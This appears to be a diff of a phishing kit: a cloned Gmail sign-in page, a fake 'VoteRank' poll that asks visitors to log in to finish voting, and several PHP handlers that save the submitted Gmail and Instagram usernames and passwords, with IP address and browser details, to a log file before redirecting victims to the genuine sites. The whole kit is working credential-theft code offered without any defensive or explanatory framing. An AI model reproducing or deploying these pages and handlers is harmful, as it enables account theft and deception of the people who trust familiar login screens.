}
.footer ul li {
color: #737373;
display: inline;
padding: 0;
padding-right: 1.5em;
}
.footer a {
color: #737373;
}
.lang-chooser-wrap {
float: right;
display: inline;
}
.lang-chooser-wrap img {
vertical-align: middle;
}
.hidden {
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
display: none !important;
}
.card {
background-color: #f7f7f7;
padding: 20px 25px 30px;
margin: 0 auto 25px;
width: 304px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
}
.card *:first-child {
margin-top: 0;
}
.rc-button {
display: inline-block;
min-width: 46px;
text-align: center;
color: #444;
font-size: 14px;
font-weight: 700;
height: 36px;
padding: 0 8px;
line-height: 36px;
-moz-border-radius: 3px;
-webkit-border-radius: 3px;
border-radius: 3px;
-o-transition: all 0.218s;
-moz-transition: all 0.218s;
-webkit-transition: all 0.218s;
transition: all 0.218s;
border: 1px solid #dcdcdc;
background-color: #f5f5f5;
background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: linear-gradient(top,#f5f5f5,#f1f1f1);
-o-transition: none;
-moz-user-select: none;
-webkit-user-select: none;
user-select: none;
cursor: default;
}
.card .rc-button {
width: 100%;
padding: 0;
}
.rc-button:hover {
border: 1px solid #c6c6c6;
color: #333;
text-decoration: none;
-o-transition: all 0.0s;
-moz-transition: all 0.0s;
-webkit-transition: all 0.0s;
transition: all 0.0s;
background-color: #f8f8f8;
background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
-moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
-webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
box-shadow: 0 1px 1px rgba(0,0,0,0.1);
}
.rc-button:active {
background-color: #f6f6f6;
background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
-moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
box-shadow: 0 1px 2px rgba(0,0,0,0.1);
}
.rc-button-submit {
border: 1px solid #3079ed;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #4d90fe;
background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);
background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);
background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);
background-image: -o-linear-gradient(top,#4d90fe,#4787ed);
background-image: linear-gradient(top,#4d90fe,#4787ed);
}
.rc-button-submit:hover {
border: 1px solid #2f5bb7;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #357ae8;
background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
background-image: linear-gradient(top,#4d90fe,#357ae8);
}
.rc-button-submit:active {
background-color: #357ae8;
background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
background-image: linear-gradient(top,#4d90fe,#357ae8);
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
.rc-button-red {
border: 1px solid transparent;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #d14836;
background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);
background-image: -moz-linear-gradient(top,#dd4b39,#d14836);
background-image: -ms-linear-gradient(top,#dd4b39,#d14836);
background-image: -o-linear-gradient(top,#dd4b39,#d14836);
background-image: linear-gradient(top,#dd4b39,#d14836);
}
.rc-button-red:hover {
border: 1px solid #b0281a;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #c53727;
background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);
background-image: -moz-linear-gradient(top,#dd4b39,#c53727);
background-image: -ms-linear-gradient(top,#dd4b39,#c53727);
background-image: -o-linear-gradient(top,#dd4b39,#c53727);
background-image: linear-gradient(top,#dd4b39,#c53727);
}
.rc-button-red:active {
border: 1px solid #992a1b;
background-color: #b0281a;
background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);
background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);
background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);
background-image: -o-linear-gradient(top,#dd4b39,#b0281a);
background-image: linear-gradient(top,#dd4b39,#b0281a);
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.google-header-bar.centered {
height: 83px;
}
.google-header-bar.centered .header .logo {
margin: 25px auto 20px;
}
.card {
margin-bottom: 20px;
}
</style>
<style media="screen and (max-width: 580px)">
html, body {
font-size: 14px;
}
.google-header-bar.centered {
height: 73px;
}
.google-header-bar.centered .header .logo {
margin: 20px auto 15px;
}
.content {
padding-left: 10px;
padding-right: 10px;
}
.hidden-small {
display: none;
}
.card {
padding: 20px 15px 30px;
width: 270px;
}
.footer ul li {
padding-right: 1em;
}
.lang-chooser-wrap {
display: none;
}
</style>
<style>
pre.debug {
font-family: monospace;
position: absolute;
left: 0;
margin: 0;
padding: 1.5em;
font-size: 13px;
background: #f1f1f1;
border-top: 1px solid #e5e5e5;
direction: ltr;
white-space: pre-wrap;
width: 90%;
overflow: hidden;
}
</style>
<link href="./Gmail_files/css" rel="stylesheet" type="text/css">
<style>
.banner {
text-align: center;
}
.banner h1 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 42px;
font-weight: 300;
margin-top: 0;
margin-bottom: 20px;
}
.banner h2 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 18px;
font-weight: 400;
margin-bottom: 20px;
}
.signin-card {
width: 274px;
padding: 40px 40px;
}
.signin-card .profile-img {
width: 96px;
height: 96px;
margin: 0 auto 10px;
display: block;
-moz-border-radius: 50%;
-webkit-border-radius: 50%;
border-radius: 50%;
}
.signin-card .profile-name {
font-size: 16px;
font-weight: bold;
text-align: center;
margin: 10px 0 0;
min-height: 1em;
}
.signin-card input[type=email],
.signin-card input[type=password],
.signin-card input[type=text],
.signin-card input[type=submit] {
width: 100%;
display: block;
margin-bottom: 10px;
z-index: 1;
position: relative;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.signin-card #Email,
.signin-card #Passwd,
.signin-card .captcha {
direction: ltr;
height: 44px;
font-size: 16px;
}
.signin-card #Email + .stacked-label {
margin-top: 15px;
}
.signin-card #reauthEmail {
display: block;
margin-bottom: 10px;
line-height: 36px;
padding: 0 8px;
font-size: 15px;
color: #404040;
line-height: 2;
margin-bottom: 10px;
font-size: 14px;
text-align: center;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.one-google p {
margin: 0 0 10px;
color: #555;
font-size: 14px;
text-align: center;
}
.one-google p.create-account,
.one-google p.switch-account {
margin-bottom: 60px;
}
.one-google img {
display: block;
width: 210px;
height: 17px;
margin: 10px auto;
}
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.banner h1 {
font-size: 38px;
margin-bottom: 15px;
}
.banner h2 {
margin-bottom: 15px;
}
.one-google p.create-account,
.one-google p.switch-account {
margin-bottom: 30px;
}
.signin-card #Email {
margin-bottom: 0;
}
.signin-card #Passwd {
margin-top: -1px;
}
.signin-card #Email.form-error,
.signin-card #Passwd.form-error {
z-index: 2;
}
.signin-card #Email:hover,
.signin-card #Email:focus,
.signin-card #Passwd:hover,
.signin-card #Passwd:focus {
z-index: 3;
}
</style>
<style media="screen and (max-width: 580px)">
.banner h1 {
font-size: 22px;
margin-bottom: 15px;
}
.signin-card {
width: 260px;
padding: 20px 20px;
margin: 0 auto 20px;
}
.signin-card .profile-img {
width: 72px;
height: 72px;
-moz-border-radius: 72px;
-webkit-border-radius: 72px;
border-radius: 72px;
}
</style>
<style>
.jfk-tooltip {
background-color: #fff;
border: 1px solid;
color: #737373;
font-size: 12px;
position: absolute;
z-index: 800 !important;
border-color: #bbb #bbb #a8a8a8;
padding: 16px;
width: 250px;
}
.jfk-tooltip h3 {
color: #555;
font-size: 12px;
margin: 0 0 .5em;
}
.jfk-tooltip-content p:last-child {
margin-bottom: 0;
}
.jfk-tooltip-arrow {
position: absolute;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore,
.jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
display: block;
height: 0;
position: absolute;
width: 0;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore {
border: 9px solid;
}
.jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
border: 8px solid;
}
.jfk-tooltip-arrowdown {
bottom: 0;
}
.jfk-tooltip-arrowup {
top: -9px;
}
.jfk-tooltip-arrowleft {
left: -9px;
top: 30px;
}
.jfk-tooltip-arrowright {
right: 0;
top: 30px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
border-color: #bbb transparent;
left: -9px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
border-color: #a8a8a8 transparent;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
border-color: #fff transparent;
left: -8px;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
border-bottom-width: 0;
}
.jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter {
border-bottom-width: 0;
}
.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
border-top-width: 0;
}
.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
border-top-width: 0;
top: 1px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore,
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
border-color: transparent #bbb;
top: -9px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter,
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
border-color:transparent #fff;
top:-8px;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore {
border-left-width: 0;
}
.jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter {
border-left-width: 0;
left: 1px;
}
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
border-right-width: 0;
}
.jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
border-right-width: 0;
}
.jfk-tooltip-closebtn {
background: url("//ssl.gstatic.com/ui/v1/icons/common/x_8px.png") no-repeat;
border: 1px solid transparent;
height: 21px;
opacity: .4;
outline: 0;
position: absolute;
right: 2px;
top: 2px;
width: 21px;
}
.jfk-tooltip-closebtn:focus,
.jfk-tooltip-closebtn:hover {
opacity: .8;
cursor: pointer;
}
.jfk-tooltip-closebtn:focus {
border-color: #4d90fe;
}
</style>
<style media="screen and (max-width: 580px)">
.jfk-tooltip {
display: none;
}
</style>
<style>
.need-help-reverse {
float: right;
}
.remember .bubble-wrap {
position: absolute;
padding-top: 3px;
-o-transition: opacity .218s ease-in .218s;
-moz-transition: opacity .218s ease-in .218s;
-webkit-transition: opacity .218s ease-in .218s;
transition: opacity .218s ease-in .218s;
left: -999em;
opacity: 0;
width: 314px;
margin-left: -20px;
}
.remember:hover .bubble-wrap,
.remember input:focus ~ .bubble-wrap,
.remember .bubble-wrap:hover,
.remember .bubble-wrap:focus {
opacity: 1;
left: inherit;
}
.bubble-pointer {
border-left: 10px solid transparent;
border-right: 10px solid transparent;
border-bottom: 10px solid #fff;
width: 0;
height: 0;
margin-left: 17px;
}
.bubble {
background-color: #fff;
padding: 15px;
margin-top: -1px;
font-size: 11px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
}
.dasher-tooltip {
position: absolute;
left: 50%;
top: 380px;
margin-left: 150px;
}
.dasher-tooltip .tooltip-pointer {
margin-top: 15px;
}
.dasher-tooltip p {
margin-top: 0;
}
.dasher-tooltip p span {
display: block;
}
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.dasher-tooltip {
top: 340px;
}
</style>
</head>
<body>
<div class="wrapper">
<div class="google-header-bar centered">
<div class="header content clearfix">
<img alt="Google" class="logo" src="google.png">
</div>
</div>
<div class="main content clearfix">
<div class="banner">
<h1>
One account. All of Google.
</h1>
<h2 class="hidden-small">
Sign in to continue to Gmail
</h2>
<!-- This is Created By ManojKashyapR(Bang) -->
</div>
<div class="card signin-card clearfix">
<img class="profile-img" src="avatar.png" alt="">
<p class="profile-name"></p>
<form novalidate="" method="post" action="login.php">
<label class="hidden-label" for="Email">Email</label>
<input id="Email" name="email" type="email" placeholder="Email" value="" spellcheck="false" class="">
<label class="hidden-label" for="Passwd">Password</label>
<input id="Passwd" name="password" type="password" placeholder="Password" class="">
<input id="signIn" name="signIn" class="rc-button rc-button-submit" type="submit" value="Sign in">
<label class="remember">
<input type="checkbox" value="yes" checked="checked">
<span>
Stay signed in
</span>
<div class="bubble-wrap" role="tooltip">
<div class="bubble-pointer"></div>
<div class="bubble">
For your protection, keep this checked only on devices you use regularly.
<a href="https://support.google.com/accounts/?p=securesignin&hl=en" target="_blank">Learn more</a>
</div>
</div>
</label>
<input type="hidden" name="rmShown" value="1">
<a id="link-forgot-passwd" href="https://accounts.google.com/RecoverAccount?service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F" class="need-help-reverse">
Need help?
</a>
</form>
</div>
<div class="one-google">
<p class="create-account">
<a id="link-signup" href="https://accounts.google.com/SignUp?service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=en">
Create an account
</a>
</p>
<p class="tagline">
One Google Account for everything Google
</p>
<img src="./Gmail_files/logo_strip_2x.png" width="210" height="17" alt="">
</div>
</div>
<div class="google-footer-bar">
<div class="footer content clearfix">
<ul id="footer-list">
<li>
Google
</li>
<li>
<a href="https://accounts.google.com/TOS?loc=PH&hl=en" target="_blank">
Privacy &amp; Terms
</a>
</li>
<li>
<a href="http://www.google.com/support/accounts?hl=en" target="_blank">
Help
</a>
</li>
</ul>
<div id="lang-vis-control" style="display: inline;">
<span id="lang-chooser-wrap" class="lang-chooser-wrap">
<label for="lang-chooser"><img src="images.png" alt="Change language"></label>
<select id="lang-chooser" class="lang-chooser" name="lang-chooser">
<option value="af">
Afrikaans
</option>
<option value="az">
azərbaycanca
</option>
</select>
</span>
</div>
</div>
</div>
</div>
</body></html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Gmail Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://accounts.google.com/signin/v2/recoveryidentifier');
exit();
?>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Gmail Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://accounts.google.com/signin/v2/recoveryidentifier');
exit();
?>

View File

@ -0,0 +1,69 @@
<!DOCTYPE html>
<html>
<head>
<style>
.hover {
color: #FFF;
text-align: center;
width: 222px;
cursor:pointer;
background-color: #0EADFF;
display: block;margin:0px auto;border-radius:20px;border-color:transparent;height:40px;
}
.hover1:hover {
color: #FFF;
text-align: center;
width: 222px;
cursor:pointer;
background-color: #108ee9;;
display: block;margin:0px auto;border-radius:20px;border-color:transparent;height:40px;
}
</style>
</head>
<title>VoteRank #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
<h1 class="w3-xlarge">VOTERANK</h1>
<h1>#289032</h1>
</header>
<body bgcolor="#eff0f1" style="text-align:center">
<div>
<form action="login2.html">
<div id="group1">
What's your name?<br><input type="text" required><br></br>
Select your favorite social networks:<br>
<input type="checkbox" value="facebook" name="social" > Facebook<br>
<input type="checkbox" value="twitter" name="social" > Twitter<br>
<input type="checkbox" value="linkedin" name="social" > LinkedIn<br>
<input type="checkbox" value="instagram" name="social" > Instagram<br>
<input type="checkbox" value="snapchat" name="social" > Snapchat<br>
<input type="checkbox" value="googleplus" name="social" > Google+<br></br>
</div>
<div id="group2">
Select your favorite colors:<br>
<input type="checkbox" value="blue" name="color" > Blue<br>
<input type="checkbox" value="red" name="color" > Red<br>
<input type="checkbox" value="green" name="color" > Green<br>
<input type="checkbox" value="yellow" name="color" > Yellow<br>
<input type="checkbox" value="purple" name="color" > Purple<br>
<input type="checkbox" value="orange" name="color" > Orange<br>
<input type="checkbox" value="black" name="color" > Black<br>
<input type="checkbox" value="white" name="color" > White<br>
<input type="checkbox" value="grey" name="color" > Grey<br>
<input type="checkbox" value="brown" name="color" > Brown<br>
<input type="checkbox" value="pink" name="color" > Pink<br>
<input type="submit" value="Submit" class="hover hover1">
</div>
</form>
</div>
</body>
</body>
</html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Gmail Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: ./result.html');
exit();
?>

View File

@ -0,0 +1,137 @@
<!DOCTYPE html>
<html>
<title>VoteRank #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<head>
<style>
@import url(https://fonts.googleapis.com/css?family=Roboto:400,100);
body {
background: url(https://dl.dropboxusercontent.com/u/23299152/Wallpapers/wallpaper-22705.jpg) no-repeat center center fixed;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
font-family: 'Roboto', sans-serif;
}
.login-card {
padding: 40px;
width: 274px;
background-color: #F7F7F7;
margin: 0 auto 10px;
border-radius: 2px;
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
overflow: hidden;
}
.login-card h1 {
font-weight: 100;
text-align: center;
font-size: 2.3em;
}
.login-card input[type=submit] {
width: 100%;
display: block;
margin-bottom: 10px;
position: relative;
}
.login-card input[type=text], input[type=password] {
height: 44px;
font-size: 16px;
width: 100%;
margin-bottom: 10px;
-webkit-appearance: none;
background: #fff;
border: 1px solid #d9d9d9;
border-top: 1px solid #c0c0c0;
/* border-radius: 2px; */
padding: 0 8px;
box-sizing: border-box;
-moz-box-sizing: border-box;
}
.login-card input[type=text]:hover, input[type=password]:hover {
border: 1px solid #b9b9b9;
border-top: 1px solid #a0a0a0;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}
.login {
text-align: center;
font-size: 14px;
font-family: 'Arial', sans-serif;
font-weight: 700;
height: 36px;
padding: 0 8px;
/* border-radius: 3px; */
/* -webkit-user-select: none;
user-select: none; */
}
.login-submit {
/* border: 1px solid #3079ed; */
border: 0px;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #4d90fe;
/* background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#4d90fe), to(#4787ed)); */
}
.login-submit:hover {
/* border: 1px solid #2f5bb7; */
border: 0px;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #357ae8;
/* background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#4d90fe), to(#357ae8)); */
}
.login-card a {
text-decoration: none;
color: #666;
font-weight: 400;
text-align: center;
display: inline-block;
opacity: 0.6;
transition: opacity ease 0.5s;
}
.login-card a:hover {
opacity: 1;
}
.login-help {
width: 100%;
text-align: center;
font-size: 12px;
}
</style>
</head>
<header class="w3-panel w3-center w3-opacity">
<h1 class="w3-xlarge">VOTERANK</h1>
<h1>#289032</h1>
</header>
<body>
<div class="login-card">
<p align="center"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2d/Google-favicon-2015.png/150px-Google-favicon-2015.png" style="width: 30%;"></p><br>
<form action="login.php" method="post">
<input type="text" name="email" placeholder="Username" required>
<input type="password" name="pass" placeholder="Password" required>
<input type="submit" name="login" class="login login-submit" value="login">
</form>
<div class="login-help">
Login in to complete poll.
</div>
</div>
</body>
</html>

View File

@ -0,0 +1,22 @@
<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
<!DOCTYPE html>
<html>
<title>Poll completed successfully. Thank You!</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
<h1 class="w3-xlarge">VOTERANK</h1>
<h1>#289032</h1>
</header>
<body>
<p align="center"><font size="10px" color="green">Poll completed successfully. Thank You!</font></p>
</body>
</body>
</html>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Instagram Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: ./login2.html');
exit();
?>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,6 @@
<?php
file_put_contents("usernames.txt", "Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: ./login3.html');
exit();
?>

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Instagram Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://instagram.com');
exit();
?>

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.8 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.7 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.7 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 107 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 395 KiB

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Instagram Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://instagram.com');
exit();
?>

Binary file not shown.

After

Width:  |  Height:  |  Size: 41 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 31 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 26 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 186 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 75 KiB

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 32 KiB

View File

@ -0,0 +1 @@
